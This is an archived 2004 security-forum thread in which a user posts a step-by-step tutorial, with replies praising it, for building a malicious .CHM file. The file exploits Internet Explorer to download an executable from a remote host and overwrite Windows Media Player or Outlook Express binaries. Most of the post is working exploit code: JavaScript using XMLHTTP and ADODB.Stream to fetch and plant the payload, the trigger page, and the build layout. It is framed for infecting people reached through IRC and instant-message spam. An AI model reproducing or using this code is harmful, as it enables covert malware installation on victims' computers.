hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
crash3rzz
Apr 9 2004, 01:48 AM
Internet Explorer - WMPlayer - [.CHM] Explained

Well First of all this is based, on these people that wee see spamming
Around on IRC,AiM or w/e ... basically the one that i am going to explain
Is based to execute through [Windows Media Player]
So only people that have WMplayer installed will be affected,
But ofcourse alot of ways to get people infected, and they wont recognize
We even tested running a .vbs scripts, which could be a crypted worm..
On the bottom, ill show another example, execute through [Outlook Express]

So first you will need to create few files.. to make the .chm file
- .HHC = Tables of Contents
- .HHK = Help Index
- *HTM = Your .HTM , this one is the actual exploit, inside the .CHM

We will need one tool, i found it ez to use: http://htm2chm.by.ru/

This is the Example of the files inside the .CHM , u can edit them and
Compile with the Program Above.

These Files Are Decompiled From .CHM
After You Edit them, u must Compile with The tool!

exploit.HHC
CODE

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"><HTML><HEAD><meta name="GENERATOR" content="Gezehua&reg; Visual CHM

V4.1 "><!-- Sitemap 1.0 --></head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top"><OBJECT type="text/site properties">
<param name="FrameName" value="right">
<param name="ImageType" value="Folder">
<param name="Window Styles" value="0x627">
<param name="Foreground" value="0x80000008">
<param name="Background" value="0xFFFFFF">
<param name="Font" value="MS Sans Serif,9,0">
</OBJECT><UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="exploit">
<param name="Local" value="exploit.htm">
<param name="ImageNumber" value="1">
</OBJECT>
</UL>
</BODY></HTML>


exploit.HHK
CODE

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"><HTML><HEAD><meta name="GENERATOR" content="http://www.vchm.com/&reg;

Visual CHM V4.1 "><!-- Sitemap 1.0 --></head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top"><OBJECT type="text/site properties">
</OBJECT><UL>
<LI><OBJECT type="text/sitemap">
<param name="Keyword" value="EXPLOIT">
<param name="Local" value="exploit.htm">
</OBJECT>
</UL></BODY></HTML>


These are the libraries for the .CHM File

Now the .HTM To Download/Execute File
Its not best Example, i took it from some site
Ill show u real ones on the bottom of the note.

CODE


<script language="vbscript">
   Function Exists(filename)
       On Error Resume Next
       LoadPicture(filename)
       Exists = Err.Number =  481
   End Function    
</script>

<script language="javascript">

   wmplayerpaths= [
           "C:\\Programmer\\Windows Media Player\\wmplayer.exe",
           "C:\\Program\\Windows Media Player\\wmplayer.exe",
           "C:\\Programme\\Windows Media Player\\wmplayer.exe",
           "C:\\Programmi\\Windows Media Player\\wmplayer.exe",
           "C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
           "C:\\Programas\\Windows Media Player\\wmplayer.exe",
           "C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
           "C:\\Program Files\\Windows Media Player\\wmplayer.exe"
          ];
   
   for (i=0;i<wmplayerpaths.length;i++) {
       wmplayerpath = wmplayerpaths[i];
       if (Exists(wmplayerpath))
           break;
   }

   function getPath(url) {
       start = url.indexOf('http:')
       end = url.indexOf('EXPLOIT.CHM')
       return url.substring(start, end);
   }
   
   payloadURL = getPath(location.href)+'yourfile.exe'; <- must be in-same dir as .chm file, in this example
   
   var x = new ActiveXObject("Microsoft.XMLHTTP");
   x.Open("GET",payloadURL,0);
   x.Send();
   
   var s = new ActiveXObject("ADODB.Stream");
   s.Mode = 3;
   s.Type = 1;
   s.Open();
   s.Write(x.responseBody);

   s.SaveToFile(wmplayerpath,2);
   location.href = "mms://";
   
</script>

[CODE]

So edit watchya gotta edit, i binded a .rar file with this so u can take look
If you getting an error, means u doing something wrong, as the files are rared
Works 100%, anyhow figure it out your self
You dont have to backup anything, WMplayer backs it self out just like some other win files.

Ex1 - Outlook Express..

[CODE]
var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://****/****.exe",0);

x.Send();
var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Outlook Express\\msimn.exe",2);
location.href = "mailto:";

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 50000);


Ex1 - Windows Media Player..

CODE

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://*****/****.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";  

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);


If you good javascripter, easier for u :>

This is the main.htm File For Your Website [INDEX]
CODE


<textarea id="code" style="display:none;">
   <object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm"

type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
   

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));
</script>


Folder Structure:

CODE

     Compiled:
             |  - exploit.chm
             |  - exploit.htm <- website index
             |  - yourfile.exe
               ---------------------
  De-Compiled:
             |  - exploit.hhc
             |  - exploit.hhk
             |  - exploit.htm
               ---------------------

  Dont Confuse the .htm's one is index, one exploit


Disabling The Exploit To Infect You?, Simple...

CODE

.uninstall [WMPlayer]
.dont use [IE] / Uninstall
.wget hxxp://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.6/mozilla-win32-1.6-installer.exe

.Now AV Picks this .chm exploit up, but only these;)


~ D0minko
EXPLOiTED
Apr 9 2004, 01:53 AM
w00000000000000000000000000000000000tttttttttt
Paul
Apr 9 2004, 10:59 AM
Nice short tut rolleyes.gif , thnx smile.gif
Imps2
Apr 10 2004, 09:16 AM
Realy nice tut

Greetz Imps2
chris105
Apr 10 2004, 01:14 PM
Nice I like it, isnt this one patched though ??
linuxwolf
Apr 11 2004, 02:06 PM
hrm... Do you lot know about the folder execution? if not i'll paste it here.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.